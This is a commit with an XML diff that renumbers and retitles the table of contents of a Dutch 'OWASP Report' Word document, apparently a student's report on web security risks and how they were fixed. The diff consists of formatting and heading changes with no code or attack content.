<commit_message>
Projections implemented Koi Dashboard
</commit_message>
<xml_diff>
--- a/docs/OWASP Report.docx
+++ b/docs/OWASP Report.docx
@@ -85,7 +85,9 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -97,7 +99,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc40955731" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011029" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -124,7 +126,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955731 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011029 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -144,7 +146,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -162,10 +164,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955732" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011030" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -192,7 +196,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955732 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011030 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -212,7 +216,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -230,10 +234,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955733" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011031" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -260,7 +266,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955733 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011031 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -280,7 +286,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -298,10 +304,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955734" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011032" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -328,7 +336,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955734 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011032 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -348,7 +356,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -366,16 +374,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955735" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011033" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Ik gebruik JPA. Ik ben veilig, toch?</w:t>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -396,7 +406,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955735 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011033 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -416,7 +426,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -434,10 +444,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955736" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011034" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -464,7 +476,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955736 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011034 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -484,7 +496,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -502,10 +514,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955737" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011035" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -532,7 +546,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955737 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011035 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -552,7 +566,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -570,10 +584,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955738" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011036" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -600,7 +616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955738 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011036 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -620,7 +636,77 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011037" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011037 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -638,10 +724,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955739" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011038" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -668,7 +756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955739 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011038 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -688,7 +776,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -706,10 +794,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955740" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011039" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -736,7 +826,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955740 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011039 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -756,7 +846,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -774,10 +864,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955741" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011040" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -804,7 +896,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955741 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011040 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -824,7 +916,77 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011041" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011041 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -842,10 +1004,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955742" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011042" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -872,7 +1036,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955742 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011042 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -892,7 +1056,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -910,10 +1074,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955743" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011043" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -940,7 +1106,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955743 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011043 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -960,7 +1126,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -978,10 +1144,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955744" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011044" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1008,7 +1176,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955744 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011044 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1028,7 +1196,77 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011045" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011045 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1046,10 +1284,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955745" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011046" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1076,7 +1316,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955745 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011046 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1096,7 +1336,217 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011047" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011047 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011048" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011048 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42011049" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Hoe heb ik dit opgelost?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011049 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1114,16 +1564,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955746" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011050" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Beperkingen op wat geauthenticeerde gebruikers mogen doen, worden vaak niet correct gehandhaafd. Aanvallers kunnen deze gebreken misbruiken om toegang te krijgen tot ongeoorloofde functionaliteit en/ of gegevens, zoals toegang krijgen tot de accounts van andere gebruikers, gevoelige bestanden bekijken, de gegevens van andere gebruikers wijzigen, toegangsrechten wijzigen, enz.</w:t>
+              <w:t>Security Misconfiguration</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1144,7 +1596,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955746 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011050 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1164,7 +1616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1182,10 +1634,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955747" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011051" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1212,7 +1666,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955747 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011051 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1232,7 +1686,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1250,10 +1704,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc40955748" w:history="1">
+          <w:hyperlink w:anchor="_Toc42011052" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1280,7 +1736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc40955748 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42011052 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1300,7 +1756,77 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
